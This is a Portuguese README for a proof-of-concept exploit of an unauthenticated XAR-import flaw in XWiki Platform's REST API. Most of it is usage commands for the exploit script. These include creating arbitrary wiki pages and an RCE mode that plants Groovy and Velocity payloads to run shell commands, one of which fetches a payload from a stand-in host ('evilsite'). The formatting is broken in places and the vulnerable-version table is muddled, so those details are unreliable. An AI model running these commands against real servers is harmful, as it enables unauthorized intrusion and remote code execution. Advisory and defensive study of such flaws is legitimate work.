
XWiki Platform - CVE-2026-33137 PoC - Importação XAR não autenticada via REST /wikis/{wikiName}
XWiki Platform - Importação de XAR não autenticada via REST /wikis/{wikiName}
O endpoint da API REST POST /wikis/{wikiName} no XWiki Platform executa uma importação de XAR (XWiki Archive) sem realizar qualquer verificação de autenticação ou autorização. Um atacante não autenticado pode criar ou atualizar documentos arbitrários na wiki alvo enviando um arquivo XAR manipulado.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Status | Versões |
|---|
| Vulnerável | > 15.10.16, > 16.4.6, > 16.10.2 |
| Corrigido | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
Um atacante não autenticado pode:
O endpoint REST POST /xwiki/rest/wikis/{wikiName} aceita um arquivo XAR no corpo da requisição e o importa diretamente na wiki sem verificar se o solicitante possui direitos de ADMIN. A correção (commit 4b7b95b) adiciona uma verificação de autorização usando ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).
# Instalar dependências
pip install requests
# Uso básico
python poc.py -t http://target:8080
# Especificar nomes de wiki, espaço e página
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Primeiro, testar o alvo
python poc.py -t http://target:8080 --probe
# Usar um proxy (ex.: Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Conteúdo personalizado
python poc.py -t http://target:8080 -c "Proof of Concept"
# Modo RCE: executar um comando no servidor alvo
python poc.py -t http://target:8080 --rce "id"
# RCE com acionamento autenticado (se houver credenciais disponíveis)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)A flag --rce importa páginas contendo payloads em Groovy e Velocity que executam a string de comando especificada. Ela automaticamente:
{{groovy}} e {{velocity}}Requisitos para RCE bem-sucedido:
-u / --password)package.xml - descritor do pacote{Space}/{Page}.xml - XML do documento com conteúdoEste PoC é fornecido apenas para fins educacionais e de teste de segurança autorizado. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. O autor não se responsabiliza por qualquer uso indevido ou danos causados por este software.